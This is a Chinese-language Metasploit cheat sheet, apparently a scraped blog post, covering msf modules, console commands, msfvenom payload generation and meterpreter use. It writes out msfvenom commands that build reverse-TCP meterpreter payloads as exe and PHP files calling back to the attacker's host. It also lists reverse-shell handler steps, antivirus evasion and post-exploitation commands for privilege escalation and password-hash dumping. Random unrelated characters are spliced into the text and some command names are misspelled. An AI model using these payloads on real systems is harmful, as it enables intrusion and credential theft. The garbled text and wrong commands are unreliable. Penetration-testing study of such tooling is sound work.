1 Metasploit介紹
Metasploit是一個漏洞利用框架坦仍,簡稱msf。默認(rèn)情況kali直接封裝msf工具
msf一般會有四種對外結(jié)構(gòu):
- msfconsole
- msfcli
- msfgui
- msfweb
2 模塊
exploit
利用程序蝶糯,針對漏洞,權(quán)限進(jìn)行利用耻讽,是主要使用的模塊
payload
用于在目標(biāo)系統(tǒng)中運(yùn)行任意命令或者執(zhí)行特定代碼有决,主要用于shell獲取
auxiliary
該模塊包含了掃描,嗅探污桦,指紋識別亩歹,網(wǎng)絡(luò)協(xié)議欺騙等相關(guān)功能模塊
encoder
該模塊主要針對exploit模塊進(jìn)行代碼免殺,以逃過殺毒軟件凡橱,防火墻捆憎,ids等安全防護(hù)機(jī)制的檢驗
3 基礎(chǔ)命令
- search ms17 ------------------------------------------------------ 查找
- use exploit/multi/handler -------------------------------------- 使用
- info ------------------------------------------------------------------ 信息
- show exploits/payloads/options ------------------------------ 顯示可用信息
- set options/payload --------------------------------------------- 給相關(guān)對象賦值
- exploit/run --------------------------------------------------------- 執(zhí)行
- exploit -j ----------------------------------------------------------- 后臺運(yùn)行
- back ----------------------------------------------------------------- 返回上一級
- sessions -i ------------------------------------------------------- 查看當(dāng)前可用會話
- sessions -K --------------------------------------------------------- 殺死所有活躍會話
4 Msfvenom基礎(chǔ)
4.1 生成命令
- 生成exe程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe> shell.exe
- 生成php程序
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw >shell.php
注
參考資料: msf下的各種生成payload命令
https://www.cnblogs.com/backlion/p/6000544.html
5 反彈shell
exploit/multi/handler
- Msfvenom生成程序
- 使用handler執(zhí)行exp
- 在目標(biāo)機(jī)器運(yùn)行Msfvenom生成程序
- 返回session
exploit/multi/script/web_delivery
- 使用web_delivery返回腳本并加載exp
- 在目標(biāo)機(jī)器運(yùn)行腳本
- 返回session
6 Meterpreter基礎(chǔ)
基礎(chǔ)命令
- getuid -----------獲得運(yùn)行Meterpreter會話的用戶名,從而查看當(dāng)前會話具有的權(quán)限
- sysinfo ---------列出受控主機(jī)的系統(tǒng)信息
- getprivs --------盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)
- getsystem -----通過各種攻擊向量來提升到系統(tǒng)用戶權(quán)限
- bashdump------導(dǎo)出目標(biāo)主機(jī)的口令hash值
- screenshot-----對目標(biāo)主機(jī)的屏幕進(jìn)行截圖
- background----將當(dāng)前Meterpreter shell 轉(zhuǎn)為后臺執(zhí)行
- quit---------------關(guān)閉當(dāng)前Meterpreter會話梭纹,返回MSF終端
- ps ------------------------------------------顯示所有運(yùn)行進(jìn)程以及關(guān)聯(lián)的用戶賬戶
- migrade PID ----------------------------遷移到一個指定進(jìn)程的PID
- execute -f cmd.exe -i -----------------執(zhí)行cmd.exe命令進(jìn)行交互
- shell ---------------------------------------以所有可用令牌來運(yùn)行一個交互shell